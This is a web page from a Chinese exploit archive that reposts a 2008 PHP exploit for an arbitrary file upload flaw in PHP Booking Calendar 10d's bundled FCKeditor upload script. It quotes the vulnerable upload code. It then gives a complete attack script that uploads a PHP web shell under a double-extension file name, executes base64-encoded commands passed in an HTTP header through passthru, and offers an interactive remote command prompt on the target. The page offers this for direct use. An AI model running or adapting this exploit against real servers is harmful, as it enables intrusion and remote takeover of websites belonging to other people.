首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit 来源：www.vfcocus.net 作者：Egix 发布时间：2008-05-30   <?php /* -------------------------------------------------------------- PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit --------------------------------------------------------------   Special thnx for : Egix [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php 41. // Get the posted file. 42. $oFile = $_FILES['NewFile'] ; 43. 44. // Get the uploaded file name and extension. 45. $sFileName = $oFile['name'] ; 46. $sOriginalFileName = $sFileName ; 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ; 48. $sExtension = strtolower( $sExtension ) ; 49. 50. // The the file type (from the QueryString, by default 'File'). 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ; 52. 53. // Check if it is an allowed type. 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) ) 55.     SendResults( 1, '', '', 'Invalid type specified' ) ; 56. 57. // Get the allowed and denied extensions arrays. 58. $arAllowed = $Config['AllowedExtensions'][$sType] ; 59. $arDenied = $Config['DeniedExtensions'][$sType] ; 60. 61. // Check if it is an allowed extension. 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) ) 63.  SendResults( '202' ) ; 64. 65. $sErrorNumber = '0' ; 66. $sFileUrl  = '' ; 67. 68. // Initializes the counter used to rename the file, if another one with the same name already exists. 69. $iCounter = 0 ; 70. 71. // The the target directory. 72. if ( isset( $Config['UserFilesAbsolutePath'] ) ) 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ; 74. else 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ; 76.  $sServerDir = $Config["UserFilesPath"] ; 77. 78. while ( true ) 79. { 80.  // Compose the file path. 81.  $sFilePath = $sServerDir . $sFileName ; 82. 83.  // If a file with that name already exists. 84.  if ( is_file( $sFilePath ) ) 85.  { 86.   $iCounter++ ; 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ; 88.   $sErrorNumber = '201' ; 89.  } 90.  else 91.  { 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ; 93. 94.   if ( is_file( $sFilePath ) ) 95.   { 96.    $oldumask = umask(0) ; 97.    chmod( $sFilePath, 0777 ) ; 98.    umask( $oldumask ) ; 99.   } 100.  101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ; 102. 103.   break ; with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) {   print "\n[-] No response from {$host}:80 Trying again...";   $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } print "\n+------------------------------------------------------------+"; print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |"; print "\n+------------------------------------------------------------+\n"; if ($argc < 2) { print "\nUsage......: php $argv[0] host path"; print "\nExample....: php $argv[0] localhost /booking_calendar/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $data  = "--12345\r\n"; $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n"; $data .= "--12345--\r\n"; $packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n"); else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; define(STDIN, fopen("php://stdin", "r")); while(1) { print "\nstack-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") {   $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";   $packet.= "Host: {$host}\r\n";   $packet.= "Cmd: ".base64_encode($cmd)."\r\n";   $packet.= "Connection: close\r\n\r\n";   $output = http_send($host, $packet);   if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");   $shell = explode("_code_", $output);   print "\n{$shell[1]}"; } else break; } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Now SMS/MMS Gateway 5.5 Remote ·80sec发现的phpwind注册漏洞 ·ASUS DPC Proxy 2.0.0.16/19 Rem ·freeSSHd 1.2.1 Remote Stack Ov ·Mambo Component mambads <= 1. ·Joomla Component com_biblestud ·CMS from Scratch <= 1.1.3 (fck ·Samba (client) receive_smb_raw ·SyntaxCMS <= 1.3 (fckeditor) ·Joomla Component com_mycontent ·VMware Server Console ActiveX ·SecurityGateway 1.0.1 (usernam   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved